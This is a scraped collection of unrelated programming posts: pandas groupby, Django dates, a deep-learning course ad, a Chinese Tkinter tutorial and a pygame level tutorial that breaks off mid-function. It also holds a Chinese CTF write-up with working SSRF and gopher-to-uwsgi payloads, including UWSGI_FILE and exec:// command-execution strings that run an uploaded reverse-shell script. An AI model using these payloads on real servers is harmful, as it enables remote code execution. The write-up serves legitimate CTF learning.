As can be seen in the the last column (salary) there are 63 Associate Professors, 53 Assistant Proffessors, and 261 Professors in the dataset. In this example we have a complete dataset and we can see that some have the same salary (e.g., there are 261 unique values in the column salary for Professors). As we will see if we have missing values in the dataframe we would get a different result. In the next example we are using Pandas mask method together with NumPy’s random.random to insert missing values (i.e., np.NaN) in 10% of the dataframe:

df_null = df.mask(np.random.random(df.shape) < .1) df_null.isnull().sum().reset_index(name='N Missing Values')
Python Pandas Groupby Tutorial

Note, we used the reset_index method above to get the multi-level indexed grouped dataframe to become a single indexed. In the particular example, above, we used the parameter name to name the count column (“N Missing Values”). This parameter, however, can only be used on Pandas series objects and not dataframe objects.

That said, let’s return to the example; if we run the same code as above (counting unique values by group) we can see that it will not count missing values:

df_null.groupby('rank').nunique()
Python Pandas Groupby Tutorial

That is, we don’t get the same numbers in the two tables because of the missing values. In the following examples we are going to work with Pandas groupby to calculate the mean, median, and standard deviation by one group.

Pandas Groupby Mean

If we want to calculate the mean salary grouped by one column (rank, in this case) it’s simple. We just use Pandas mean method on the grouped dataframe:

df_rank['salary'].mean().reset_index()
Python Pandas Groupby Tutorial

Having a column named salary may not be useful. For instance, if someone else are going to see the table they may not know that it’s the mean salary for each group. Luckily, we can add the rename method to the above code to rename the columns of the grouped data:

df_rank['salary'].mean().reset_index().rename( columns={'rank':'Rank','salary' : 'Mean Salary'})
Python Pandas Groupby Tutorial
Median Score of a Group Using the groupby Method in Pandas

Now lets group by disciplne of the academic and find the median salary in the next Pandas groupby example

df.groupby('rank')['salary'].median().reset_index().rename( columns={'rank':'Rank','salary' : 'MedianSalary'})
Python Pandas Groupby Tutorial
Aggregate Data by Group using Pandas Groupby Most of the time we wan

Get a date from a Django DateTimeField

$
0
0

I would like to request some assistance regarding this matter

I am learning django and trying out some codes but I hit a brick wall at trying to get the date only from a model's DateTimeField

here's the code that I am working on:

class APPLICANT_DATA(models.Model): SCHEDULED_AT = models.DateTimeField(null=True, blank=True) def somefunction(): app_data = APPLICANT_DATA.objects.all() for item in app_data: the_date = str(item.SCHEDULED_AT.strftime("%B-%d-%Y")) + ", " + the _date

And I am getting ( 'NoneType' object has no attribute 'strftime' ) even though my model contains 3 records that all have date and time

What am I doing wrong? any advice for a newbie? many thanks.

DateTimeField becomes a datetime.datetime object in python

If you need a date object to manipulate later on, you could pull the datetime.date object directly from your DateTimeField() , using datetime.datetime.date() like below:

class ApplicantData(models.Model): scheduled_at = models.DateTimeField(null=True, blank=True) date = application_data.scheduled_at.date()

This works because Django will translate the DateTimeField into the Python type datetime.datetime , upon which we have called date() .

Format the datetime.date like you wish

Then from that, you get a datetime.date object, that you can format like you wish, using datetime.date.strftime() .

If you don't need a date object, you can also use strftime on your datetime.datetime object too, no problems with that. Except that your had a None field in your object.

Dealing with NULL / None fields

If you want to allow for NULL values in scheduled_at you can do:

if application_data.scheduled_at is not None: date = application_data.scheduled_at.date()

Dataquest: An Intro to Deep Learning in Python

$
0
0

Deep learning is a type of machine learning that’s growing at an almost frightening pace. Nearly every projection has the deep learning industry expanding massively over the next decade. This market research report , for example, expects deep learning to grow 71x in the US and more than that globally over the next ten years. There’s never been a better time than now to get started.

To make that start easier for you, we’ve just launched a new course: Deep Learning Fundamentals .


Dataquest: An Intro to Deep Learning in Python

This course is designed to give you an introduction to neural networks and deep learning. You’ll start with the theories behind these concepts, and gen familiar with representing linear and logistic regression models as graphs. Then you’ll start digging deeper into topics like nonlinear activation functions and work on improving your models by adding hidden layers of neurons, using the scikit-learn package in python. Finally, you’ll build a deep learning model that’s capable of looking at images of handwritten numbers and identifying/classifying them correctly.

Why you should dive into deep learning Boost your earnings

Although salaries for general data scientists are already excellent, as specialists, machine learning and deep learning engineers can command even higher rates. According to Indeed.com data from the US, for example, machine learning engineer salaries average around 13% higher than data scientist salaries.

Having some deep learning skills can also help your resume stand out from the herd when it comes to applying for data science jobs, even if you haven’t yet reached the level of deep learning specialist.

Demand for deep learning is growing

There’s no doubt that machine learning is a fast-growing field, and within it, deep learning is also growing at a breakneck pace. Specific market projections vary from firm to firm to firm , but everybody agrees on the general trend: demand for deep learning is headed through the roof.

It saves time

If you’ve messed with other forms of machine learning, you know that feature engineering - converting your input’s parameters into “features” your algorithm can read - can be a fairly difficult and time-intensive process. But the neural networks used in deep learning are designed to do that conversion automatically. So, for example, instead of having to figure out how to pull color data, histograms, and other metrics from a set of images, you can just run the raw images through your neural network and it will do the work for you!

That’s making it sound easy, of course, and it isn’t; the challenge is getting the network to the point where it’s capable of doing that work for you. But that means you’ll spend more time working with your algorithms and less time fiddling with features.

Specialize while staying flexible

Building a specialty can help you find work in any field, but it can also put you into a position where you’re doomed to be doing the same thing every day because your speciality is only appealing to a limited number of companies who are all doing the same sort of thing. Thankfully, that’s not the case with deep learning, which is in demand across a wide swath of industries and is being put to use to solve problems ranging from image recognition to translation to robotics.

It’s fun!

Career advantages aside, let’s not forget that deep learning is just plain cool. You can use it to get machines to do everything, from automatically colorizing old photos to destroying the world’s greatest chess players without actually teaching them how to do those things.

Ready to dive into the deep? The first mission ofthe new course is completely free so everybody can try it out, but you will need aPremium subscription to complete the course.

创建第一个Tkinter图形界面|先生的Tkinter教程(1)

$
0
0

文章目录

一、为什么使用Tkinter而非PyQt 二、创建一个基本的Tkinter程序 一、为什么使用Tkinter而非PyQt

众所周知,在python中创建图形界面程序有很多种的选择,其中PyQt和wxPython都是很热门的模块包,这些第三方的图形界面模块功能强大、配置丰富,界面美观,是很多人的选择。

州的先生也经常使用PyQt5来为Python程序写上图形界面,以方便程序的使用。同时还写了一个简短的PyQt5入门教程: 《州的先生PyQt5入门教程》 ,对PyQt5感兴趣的小伙伴可以前往阅读。

而今天,我们要介绍的是Python内置的一个图形界面模块――tkinter。

在网络上有很多抱怨Tkinter模块的言论,比如:界面丑、不灵活、扩展功能差、模块少……等等,诚然,Tkinter确实有这些毛病或者说是缺点,但是它也并非是一无是处。

Tkinter最大的优势,在于其是Python的内置模块;仅仅是这一点,就可以带来很多优点。由于是内置模块,所以不需要进行额外的安装,这也就避免了很多刚刚接触的小伙伴可以顺利地开始import,而非各种pip安装失败或者是到处找各种版本可行的安装包(PyQt5就有很多这样的情况)。

同时,因为其内置模块的属性,使得其在程序打包为EXE或其他可执行文件的时候,打包出来的程序文件不会特别的大,这样对程序的传播还是很有用处的。

想一想,简简单单地写了一个小工具,结果打包出来的文件有几十兆之大,很是尴尬的。

介绍了那么多,下面,我们开始正式学习使用Tkinter编写Python图形界面程序。

二、创建一个基本的Tkinter程序 导入Tkinter模块

Tkinter模块的导入很简单,直接使用命令:

import tkinter

即可。

同时一般约定俗成其模块名简写为tk,所以导入命令为:

import tkinter as tk 实例化一个Tk类

所有的图形界面都有一个最顶级的容器,在PyQt5中有MainWindow、Widget等,而在Tkinter中,最常见最基础的则是Tk()类,当然在程序比较大或者图形窗口比较多的时候,使用Frame或Toplevel等容器部件会更加方便,但是在这里我们才刚刚使用Tkinter,所以就用Tk()类作为图形界面的最顶级容器:

import tkinter as tk root = tk.Tk() # 实例化一个Tk()主窗口 设置窗口标题

上一步实例化了一个Tk()类并赋值给root变量之后,我们就拥有了一个TK窗口,接下来我们通过它的title()方法为窗口设置标题:

import tkinter as tk root = tk.Tk() root.title("第一个Tkinter程序")

这样,我们就将窗口的标题设置为了“第一个Tkinter程序”。

运行图形界面窗口

在创建了一个基本的窗口之后,我们如何将这个图形界面窗口运行起来呢?在PyQt5中我们可以使用窗口的show()方法来启动窗口主循环,而在Tkinter中,我们则可以使用窗口的mainloop()方法启动窗口的主循环,使得图形界面窗口运行起来:

import tkinter as tk root = tk.Tk() root.title("第一个Tkinter程序") root.mainloop()

这样,我们创建的图形界面窗口将在Python文件被运行是出现。其效果如下图所示:


创建第一个Tkinter图形界面|先生的Tkinter教程(1)
创建一个按钮

在上面,我们创建了一个只有一个窗口的图形界面,现在我们往里面再添加一些小部件,比如按钮;在Tkinter中,按钮为tk.Button()类,通过实例化这个类,我们能创建一个按钮部件:

import tkinter as tk # 引入tkinter模块 root = tk.Tk() # 实例化一个TK()类 btn = tk.Button(root,text='点我吧') # 实例化一个按钮类,父元素为root btn.pack(padx=200,pady=50) # 设置按钮的大小 root.title('第一个Tkinter程序') # 设置图形界面标题 root.mainloop()

在这里,我们实例化了一个父类为root的Button()类,并且设置了按钮的文本。然后通过它的pack()方法设置的按钮的长度和宽度。继续运行程序,我们将会得到如下图所示的图形界面程序:


创建第一个Tkinter图形界面|先生的Tkinter教程(1)
为按钮绑定一个命令

上面创建的图形界面包含了一个窗口和一个按钮,但是按钮放着有什么用呢?我们可以将它绑定到一个函数来,来实现点击事件的反馈。这在PyQt5中是一个很重要的概念――信号槽。而在Tkinter中也有类似的概念,在接下来的文章中,我们会逐步涉及到。

我们首先创建一个简单的函数,用于在控制台中打印一个字符串:

def tell_you(): print("州的先生Tkinter教程")

然后通过按钮的config()方法,为按钮配置一个命令:

import tkinter as tk # 引入tkinter模块 def tell_you(): print("州的先生Tkinter教程") root = tk.Tk() # 实例化一个TK()类 btn = tk.Button(root,text='点我吧') # 实例化一个按钮类,父元素为root btn.config(command=tell_you) btn.pack(padx=200,pady=50) # 设置按钮的大小 root.title('第一个Tkinter程序') # 设置图形界面标题 root.mainloop()

这样,当我们点击按钮的时候,程序就会调用tell_you()函数,在控制台打印出“州的先生Tkinter教程”字符串,其效果如下图所示:


创建第一个Tkinter图形界面|先生的Tkinter教程(1)
三、模块化Tkinter程序

在上面的程序中,我们所有的变量都是全局变量,无论是根窗口还是按钮小部件。这在程序很小的时候,或许没有问题,但是当我们添加的部件越来越多的时候,就很不方便维护了。基于此,我们可以使用面向对象的方法来重新组织我们的图形界面程序。以类和对象的方式作为图形界面窗口的组织单元。

import tkinter as tk class Mainwindows(tk.Tk): def __init__(self): super().__init__() # 初始化基类 self.title("第一个程序") self.ini_ui() def ini_ui(self): self.btn = tk.Button(self,text='点我吧') self.btn.pack(padx=200,pady=30) self.btn.config(command=self.tell_you) def tell_you(self): print("州的先生Tkinter教程") if __name__ == '__main__': app = MainWindows() app.mainloop()

现在,每一个变量都只限于MainWindows()内;这样,我们就将第一个Tkinter图形界面程序改造成了面对对象式。运行代码,也会得到和之前一样的图形界面程序:


创建第一个Tkinter图形界面|先生的Tkinter教程(1)

Real World CTF Magic Tunnel Write Up

$
0
0

赛时的时候没看这个题目,最后时间队友发现了点,但是苦于本地搭建不好环境以及没有时间就放弃了。

言归正传。

打开题目我们发现提供了一个Download功能,随便测试下,例如: http://www.venenof.com/1.gif


Real World CTF Magic Tunnel Write Up

同时这里没有限制任何后缀,那么这意味着我们可以远程下载任意文件。

通过file协议我们可以读取任意文件,利用 file:///proc/mounts 可以找到web目录:


Real World CTF Magic Tunnel Write Up

进而我们可以读取web目录的相关文件:

其中 rwctf/settings.py 的内容如下:

""" Django settings for rwctf project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os import dj_database_url # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ.get('SECRET_KEY', 'y5fc9nypwm%x1w^plkld4y#jwgrd)$ys6&!cog^!3=xr5m4#&-') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.environ.get('DEBUG', '0') in ('True', 'true', '1', 'TRUE') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'xremote', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'rwctf.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.template.context_processors.media', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'rwctf.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': dj_database_url.config(conn_max_age=600, default='sqlite:////tmp/db.sqlite3') } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, javascript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') LOG_PATH = os.environ.get('LOG_PATH', os.path.join(BASE_DIR, 'error.log')) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'standard': { 'format': '[%(asctime)s] - [%(levelname)s] - [%(pathname)s:%(lineno)d] - %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S' }, }, 'handlers': { 'console': { 'level': 'WARNING', 'class': 'logging.StreamHandler', 'formatter': 'standard', 'filters': ['discard_not_found_error'], } }, 'loggers': { '': { 'handlers': ['console'], 'level': 'WARNING' }, 'django': { 'handlers': ['console'], 'level': 'WARNING' }, }, 'filters': { 'discard_not_found_error': { '()': 'django.utils.log.CallbackFilter', 'callback': lambda record: hasattr(record, 'status_code') and record.status_code != 404, } }, }

读取 urls.py

from django.contrib import admin from django.urls import path, include urlpatterns = [ path('', include('xremote.urls', namespace='xremote')), path('admin/', admin.site.urls), ]

最后读取 xremote.views.py :

import os import pycurl import uuid from django.utils import dateformat, timezone from django.shortcuts import render from django.views import generic from django.db import transaction from django.urls import reverse_lazy from django.conf import settings from django.http import HttpResponseRedirect from . import forms from . import models class ImgsMixin(object): def get_context_data(self, **kwargs): kwargs['imgs'] = self.request.session.get('imgs', []) return super().get_context_data(**kwargs) class DownloadRemote(ImgsMixin, generic.FormView): form_class = forms.ImageForm template_name = 'index.html' success_url = reverse_lazy('xremote:download') def download(self, url): try: c = pycurl.Curl() c.setopt(pycurl.URL, url) c.setopt(pycurl.TIMEOUT, 10) response = c.perform_rb() c.close() except pycurl.error: response = b'' return response def generate_path(self): path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d')) if not os.path.exists(path): os.makedirs(path, 0o755) return os.path.join(path, str(uuid.uuid4())) @transaction.atomic def form_valid(self, form): url = form.cleaned_data['url'] response = self.download(url) path = self.generate_path() if response: with open(path, 'wb') as f: f.write(response) url = path[len(settings.MEDIA_ROOT)+1:] models.Image.objects.create(path=url) if 'imgs' not in self.request.session: self.request.session['imgs'] = [] self.request.session['imgs'].append(url) self.request.session.modified = True return HttpResponseRedirect(self.get_success_url())

在这里,我们发现在 settings.py 中,引用了 uwsgi ,同时通过 server.sh 得到 uwsgi 的部署方式:

#!/bin/sh BASE_DIR=$(pwd) ./manage.py collectstatic --no-input ./manage.py migrate --no-input exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1

在 uwsgi 中,存在 UWSGI_FILE 这种魔术变量会将指定的文件作为一个新的动态应用加载,那么如果这个文件使我们可以控制的,那么就会造成RCE漏洞。

回到开头,我们已经知道网站可以任意download文件,那么我们在本地测试下,搭建 参考文章 ,而魔术方法可以自动加载执行文件,于是成功执行如下:


Real World CTF Magic Tunnel Write Up

本地抓一下包:

tcpdump -i lo -port 8001 -w dump.pcap 或者直接nc也可以。

前面我们知道有一个download功能,实际上也是一个ssrf漏洞,于是我们可以利用gopher去内网请求 uwsgi ,进而动态执行我们自己的脚本,本地测试如下:


Real World CTF Magic Tunnel Write Up

于是我们回到题目里,先远程下载一个反弹shell的pythonshell,然后得到文件名,例如 /usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef ,然后将gopher的数据改为:

gopher://127.0.0.1:8000/_%00u%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0035776%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0A%00UWSGI_FILE%09%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A

但是我们要注意

from django import forms from . import models class ImageForm(forms.Form): url = forms.CharField(max_length=512,widget=forms.URLInput())

长度只有512字节,上面的肯定超了,意味着我们要自己更改,在反复尝试后,我发现,其第二位字符的ASCII值实际上就是整个数据包的长度,于是本地修改payload如下:

<?php echo urlencode(chr(strlen(urldecode('%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A')))); ?> gopher://127.0.0.1:8000/_%00%E4%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/03/0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A

但是在本地是可以得到执行的,反而题目却不可以,猜测可能是题目环境配置的问题,通过翻阅文档,我发现 UWSGI_APPID 这个魔术方法,其作用是绕过 SCRIPT_NAME 和 VirtualHosting ,从而让用户在没有限制的情况下选择挂载点。如果在应用的内部列表中找不到它,那么要加载它。于是可以像下面这样修改:

server { server_name server001; location / { include uwsgi_params; uwsgi_param UWSGI_APPID myfunnyapp; uwsgi_param UWSGI_FILE /var/www/app1.py } }

本地抓包如下:

%00%C6%01%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00REQUEST_URI%01%00%2F%09%00PATH_INFO%01%00%2F%0D%00DOCUMENT_ROOT%15%00%2Fusr%2Fshare%2Fnginx%2Fhtml%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00UWSGI_SCHEME%04%00http%0B%00REMOTE_ADDR%09%00127.0.0.1%0B%00REMOTE_PORT%05%0036452%0B%00SERVER_PORT%04%008000%0B%00SERVER_NAME%0B%00example.com%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00%2Fusr%2Fsrc%2Frwctf%2Fmedia%2F2018%2F12%2F03%2F0c0eb4ee-115e-48b5-8fda-c18d81d1ceef%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl%2F7.55.1%0B%00HTTP_ACCEPT%03%00%2A%2F%2A

修改payload如下:

gopher://127.0.0.1:8000/_%00%FA%00%00%0C%00QUERY_STRING%00%00%0E%00REQUEST_METHOD%03%00GET%0C%00CONTENT_TYPE%00%00%0E%00CONTENT_LENGTH%00%00%0B%00UWSGI_APPID%07%00testxdd%0A%00UWSGI_FILED%00/usr/src/rwctf/media/2018/12/04/7683a121-2d76-4a03-b35c-532bbe7f1483%09%00HTTP_HOST%0E%00localhost%3A8000%0F%00HTTP_USER_AGENT%0B%00curl/7.55.1%0B%00HTTP_ACCEPT%03%00%2A/%2A

然后反弹shell即可:-D


Real World CTF Magic Tunnel Write Up

赛后发现其实早在一月份就有人有了 利用方式 ,而因为uWSGI程序中默认的schemes有 exec ,所以其实可以直接RCE,而同时作者也给了脚本,甚至于不用本地搭建环境可以直接抓取原始数据包,例如:

%00%DF%00%00%0E%00REQUEST_METHOD%03%00GET%09%00HTTP_HOST%09%00127.0.0.1%09%00PATH_INFO%08%00%2Ftestapp%0B%00SERVER_NAME%09%00127.0.0.1%0F%00SERVER_PROTOCOL%08%00HTTP%2F1.1%0C%00QUERY_STRING%00%00%0B%00SCRIPT_NAME%08%00%2Ftestapp%0A%00UWSGI_FILE%20%00exec%3A%2F%2Ftouch%20%2Ftmp%2Fccc%3B%20echo%20test%0B%00REQUEST_URI%08%00%2Ftestapp

感谢ph师傅给的docker,复现过程遇到了好几个问题,确实很real world

gamingdirectional: Create the third level for this pygame project

$
0
0

In this article we are going to create the third level for our pygame project after we have created the previous two levels, the reason I create the third game level in this chapter is because this level is different from the second level which is only using the same enemy class to generate different type of enemy ship. In this chapter we are going to create a new enemy class which will act differently as compared with the previous enemy class.

We will create a new enemy object which moves from side to side and shoots three missiles at the same time, we can add in more features to this new enemy class later on but for now lets just create a simple one first.

from pygame import math as mt
from Objectpool import Objectpool
class Enemy1(object):
def __init__(self, enemy_surface, x, y):
self.on = True
self.enemy_surface = enemy_surface
self.x = x
self.y = y
self.hit = False
self.direction = True
self.enemy_pos = mt.Vector2(self.x, self.y)
self.missile_count = 10
self.missile_timer = 0
self.missile_object_pool = Objectpool(self.missile_count)
self.missile_list = []
def update(self):
if(self.direction == True):
self.x += 0.1
else:
self.x -= 0.1
self.enemy_pos = mt.Vector2(self.x, self.y)
self.missile_update(self.missile_object_pool)
def missile_update(self, pool):
for item in list(self.missile_list):
if (item.on == False):
self.missile_list.remove(item)
pool.recycle(item)
else:
item.update()
def missile_draw(self, scene): # draw enemy missiles on game scene
for item in list(self.missile_list):
scene.blit(item.missile_surface, item.missile_pos)
def create_enemy_missile(self, enemy_missile_manager):
if(self.missile_timer > 300):
self.missile_timer = 0
if (self.missile_object_pool.getSize() > 0):
enemy_missile_manager.create_missile(self.x + 3, self.y + 100, self.missile_object_pool, self.missile_list)
enemy_missile_manager.create_missile(self.x + 50, self.y + 100, self.missile_object_pool, self.missile_list)
enemy_missile_manager.create_missile(self.x + 100, self.y + 100, self.missile_object_pool, self.missile_list)
else:
enemy_missile_manager.create_missile(self.x + 3, self.y + 100, None, self.missile_list)
enemy_missile_manager.create_missile(self.x + 50, self.y + 100, None, self.missile_list)
enemy_missile_manager.create_missile(self.x + 100, self.y + 100, None, self.missile_list)
else:
self.missile_timer += 1

Next is to edit the enemy manager class by adding in the level three scene’s objects.

from Enemy import Enemy
from GameSprite import GameSprite
from pygame.locals import *
from EnemyMissileManager import EnemyMissileManager
import random
from Objectpool import Objectpool
from Enemy1 import Enemy1
class EnemyManager(object):
def __init__(self, scene, player, game_level):
self.enemy_missile_manager = EnemyMissileManager()
self.scene = scene
self.player = player
self.enemy_count = 10
self.horizontal_enemy_count = 1
self.missile_count = 60
self.enemy_list = []
self.horizontal_enemy_list = []
self.image = 'Asset/enemy0.png'
self.image1 = 'Asset/enemy1.png'
self.image2 = 'Asset/enemy2.png'
self.width = 30
self.height = 30
self.width1 = 130
self.height1 = 130
self.rect = Rect(0, 0, self.width, self.height)
self.rect1 = Rect(0, 0, self.width1, self.height1)
self.more_enemy = 0
self.y = -50
self.boundary_width = 660
self.boundary_height = 660
self.object_pool = Objectpool(self.enemy_count)
self.horizontal_object_pool = Objectpool(self.horizontal_enemy_count)
self.next_enemy = 0
self.level = game_level
# initialize game sprite object
self.sprite = GameSprite(self.image, self.rect)
self.sprite1 = GameSprite(self.image1, self.rect)
self.sprite2 = GameSprite(self.image2, self.rect1)
def create_enemy(self, x, y):
if(self.enemy_count > 0):
if(self.object_pool.getSize() > 0): # get the ship from object pool if the pool is not empty
self.enemy_list.append(self.object_pool.obtain())
else: # objects setup based on the level of the game
if(self.level == 1):
self.enemy_surface = self.sprite.getImage()
elif(self.level == 2 or self.level == 3):
if(self.next_enemy == 0):
self.enemy_surface = self.sprite.getImage()
self.next_enemy += 1
elif(self.next_enemy == 1):
self.enemy_surface = self.sprite1.getImage()
self.next_enemy = 0
self.enemy_list.append(Enemy(self.enemy_surface, x, y))
self.enemy_count -= 1
def create_horizontal_enemy(self, x, y):
if (self.horizontal_enemy_count > 0):
if (self.horizontal_object_pool.getSize() > 0): # get the ship from object pool if the pool is not empty
self.horizontal_enemy_list.append(self.horizontal_object_pool.obtain())
else: # objects setup based on the level of the game
if (self.level == 3):
self.enemy_surface1 = self.sprite2.getImage()
self.horizontal_enemy_list.append(Enemy1(self.enemy_surface1, x, y))
self.horizontal_enemy_count -= 1
def update(self):
if (self.level == 1 or self.level == 2):
if (self.more_enemy > 600):
self.more_enemy = 0
x = random.randint(30, self.boundary_width - 50)
self.create_enemy(x , self.y) # create more enemy
else:
self.more_enemy += 1 # increase time
elif(self.level == 3):
if (self.more_enemy > 600):
self.more_enemy = 0
x = random.randint(30, self.boundary_width - 50)
self.create_enemy(x , self.y) # create more enemy
else:
self.more_enemy += 1 # increase time
if(self.horizontal_enemy_count > 0):
self.create_horizontal_enemy(-130, 200) # create new enemy
self.enemy_update()
self.check_boundary()
self.create_enemy_missile()
def create_enemy_missile(self):
for item in list(self.enemy_list):
if(self.player.pos.y - item.y < 100 and abs(self.player.pos.x - item.x) < 60 ):
item.create_enemy_missile(self.enemy_missile_manager)
if(self.level == 3):
for item in list(self.horizontal_enemy_list):
item.create_enemy_missile(self.enemy_missile_manager)
def enemy_update(self):
for item in list(self.enemy_list):
if(item.on == False):
self.enemy_list.remove(item)
self.enemy_count += 1
item.y = self.y
item.on = True
self.object_pool.recycle(item)
else:
item.update()
if (self.level == 3):
for item in list(self.horizontal_enemy_list):
if (item.on == False):
self.horizontal_enemy_list.remove(item)
self.horizontal_enemy_count += 1
item.y = 220
item.x = -130
item.on = True
self.horizontal_object_pool.recycle(item)
else:
item.update()
# check the boundary of the enemy ship with the game scene area
def check_boundary(self):
for i in range(len(self.enemy_list)):
if (self.enemy_list[i].y > self.boundary_height):
self.enemy_list[i].on = False
if (self.level == 3):
for i in range(len(self.horizontal_enemy_list)):
if (self.horizontal_enemy_list[i].x > self.boundary_width):
self.horizontal_enemy_list[i].direction = False
elif(self.horizontal_enemy_list[i].x <= -130):
self.horizontal_enemy_list[i].direction = True
def draw(self):
# blit the enemy and enemy missiles on the scene
for i in range(len(self.enemy_list)):
self.scene.blit(self.enemy_list[i].enemy_surface, self.enemy_list[i].enemy_pos)
self.enemy_list[i].missile_draw(self.scene)
if(self.level == 3):
for i in range(len(self.horizontal_enemy_list)):
self.scene.blit(self.horizontal_enemy_list[i].enemy_surface, self.horizontal_enemy_list[i].enemy_pos)
self.horizontal_enemy_list[i].missile_draw(self.scene)

We also need to edit the overlap class which will now take level three into consideration.

from pygame.locals import *
class Overlap(object):
def __init__(self):
pass # nothing here
# is player and enemy, player missile, enemy missile overlap
def isOverlap(self, player, em, ex, score, gm):
self.checkOverlap(em.enemy_list, player, ex, gm, score, em.width, em.height, em.enemy_missile_manager.width, em.enemy_missile_manager.height, None)
if(gm.level_manager.get_level() == 3):
self.checkOverlap(em.horizontal_enemy_list, player, ex, gm, score, em.width1, em.height1, em.enemy_missile_manager.width, em.enemy_missile_manager.height, gm.level_manager.get_level())
def checkOverlap(self, e_list, player, ex, gm, score, width, height, m_width, m_height, level):
self.player_rect = Rect(player.pos.x, player.pos.y, player.width, player.height)
for i in range(len(e_list)): # is player collides with enemy
self.em_rect = Rect(e_list[i].x, e_list[i].y, width, height)
if (self.player_rect.colliderect(self.em_rect)):
e_list[i].on = False
if (e_list[i].hit == False):
ex.create_explosion(player.pos.x + 2, player.pos.y + 2)
e_list[i].hit = True
gm.state = gm.OVER
gm.setup(gm.level_manager.get_level())
for i in range(len(e_list)): # is enemy missile hits player
for j in range(len(e_list[i].missile_list)):
self.em_rect = Rect(e_list[i].missile_list[j].x, e_list[i].missile_list[j].y,
m_width, m_height)
if (self.player_rect.colliderect(self.em_rect)):
e_list[i].missile_list[j].on = False
ex.create_explosion(player.pos.x + 2, player.pos.y + 2)
score.set_score(-1)
if (score.score < 0):
gm.state = gm.OVER
gm.setup(gm.level_manager.get_level())
for i in range(len(e_list)): # is player missile hits enemy
self.em_rect = Rect(e_list[i].x, e_list[i].y, width, height)
